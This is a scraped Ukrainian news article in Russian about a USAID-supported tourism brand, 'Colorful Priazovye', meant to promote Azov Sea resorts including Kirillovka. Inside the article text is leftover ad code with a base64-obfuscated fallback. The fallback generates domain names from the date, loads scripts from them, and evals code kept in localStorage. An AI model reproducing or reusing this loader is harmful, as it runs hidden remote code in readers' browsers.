Важные новости
«Запорожгаз» — плевать на всех и армейские методы.Тимчасово окупований Мелітополь огорнуло бавовняним туманом. ФотоУ Запорізькій міськраді планують змінити платформу для подання електронних петицій…«Всі заклади дошкільної освіти працюють дистанційно», — директорка Департаменту освіти…В департаменті освіти ЗОВА розповіли, скільки вчителів залишилися на окупованій…В Запоріжжі оштрафували двох маршрутників, які проїхали перехрестя на заборонений…Патрульні розшукали у Запоріжжі водіїв маршруток, які їхали на заборонений сигнал світлофораНа сайті президента пропонують надати звання Героя України посмертно військовослужбовцю,…Проросійському митрополиту в столиці подовжили домашній арештБанкетные залы, VIP, отдельные домики: какое кафе продается в Запорожье…Банкетні зали, VIP, окремі будиночки: яке кафе продається в Запоріжжі…

Нашли способ сделать популярной Кирилловку даже за границей

С помощью нового туристического бренда Кирилловку и другие курорты Приазовья хотят сделать популярными даже за границей.

Для Приазовья был разработан единый туристический бренд со слоганом «Колоритное Приазовье».

Об этом сообщает Восточный вариант со ссылкой на Проект USAID.

При содействии Проекта USAID «Экономическая поддержка Восточной Украины» (Проект USAID) «Zruchno Travel» и «Bulanov büro» разработали для Приазовья единый туристический бренд.

В Запорожской области исчезает популярное место отдыха на берегу моря (ФОТО)

Cлоганом региона выбрали фразу «Колоритное Приазовье». Под этим брендом будут продвигать четыре района — Бердянский и Мелитопольский (Запорожская область), Генический (Херсонская область) и Мариупольский (Донецкая область), а также вторичные дестинации — Белозерский и Каховский районы (Херсонская область). var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Туристический бренд Азовского региона является прекрасным инструментом позиционирования и продвижения туристической дестинации, — рассказывает руководитель сектора туризма проект USAID Александр Файнин. — Логотипы и слоган, который избран подавляющим большинством голосов экспертов туристической сферы Приазовья, можно использовать для брендирования сувенирной продукции, маркировка туристических маршрутов, на интернет-ресурсах, в транспорте. Имеем целью увеличить узнаваемость бренда «Приазовье» не только в пределах Украины, но и за рубежом, поэтому предлагаем представителям местного бизнеса и власти чаще использовать логотип и слоган».

Вскоре состоятся презентации туристического бренда на национальном и областном уровнях.

В этом году при содействии Проекта USAID планируется также создание туристического портала Приазовья и серии видеоблогов о туризме региона. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/nashli-sposob-sdelat-populyarnoj-kirillovku-dazhe-za-granitsej/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top